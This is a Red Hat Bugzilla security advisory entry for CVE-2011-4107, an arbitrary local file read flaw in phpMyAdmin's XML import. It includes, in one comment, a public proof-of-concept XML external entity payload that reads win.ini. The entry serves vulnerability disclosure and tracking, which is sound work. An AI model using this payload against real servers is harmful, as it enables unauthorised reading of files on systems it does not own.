Bug 751112 - (CVE-2011-4107) CVE-2011-4107 phpMyAdmin: Arbitrary file read flaw by loading XML strings
CVE-2011-4107 phpMyAdmin: Arbitrary file read flaw by loading XML strings
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity low
: ---
: ---
Assigned To: Red Hat Product Security
impact=low,public=20111101,reported=2...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2011-11-03 10:57 EDT by Jan Lieskovsky
Modified: 2015-07-31 02:45 EDT (History)
2 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2014-07-19 11:44:11 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Jan Lieskovsky 2011-11-03 10:57:10 EDT
A local file inclusion flaw was found in the way XML import plug-in of phpMyAdmin, a tool written in PHP intended to handle the administration of MySQL over the World Wide Web, performed import of malformed XML files. A remote attacker could provide a specially-crafted XML file, which once imported into the phpMyAdmin service instance would lead to arbitrary local file (accessible with the privileges of the phpMyAdmin user) read / retrieval.

References:
[1] http://seclists.org/fulldisclosure/2011/Nov/21
[2] http://www.wooyun.org/bugs/wooyun-2010-03185
Comment 1 Jan Lieskovsky 2011-11-03 11:12:41 EDT
CVE request:
[3] http://www.openwall.com/lists/oss-security/2011/11/03/3
Comment 2 Jan Lieskovsky 2011-11-03 11:14:21 EDT
Public PoC from [1] (for Microsoft Windows OS though):
======================================================

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>



<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/";>

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci"
charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

    - 数据库: 'thinksns'

    -->

    <database name="thinksns">

        <!-- 表 ts_ad -->

    </database>

</pma_xml_export>
Comment 3 Jan Lieskovsky 2011-11-03 11:15:23 EDT
Regarding upstream patches (not sure phpMyAdmin upstream provided a changeset for this issue already, since it was reported two days ago). Cc-ed them on the CVE request for further patch information.
Comment 4 Vincent Danen 2011-11-04 00:31:49 EDT
This has been assigned the name CVE-2011-4107:

http://www.openwall.com/lists/oss-security/2011/11/03/5

Note You need to log in before you can comment on or make changes to this bug.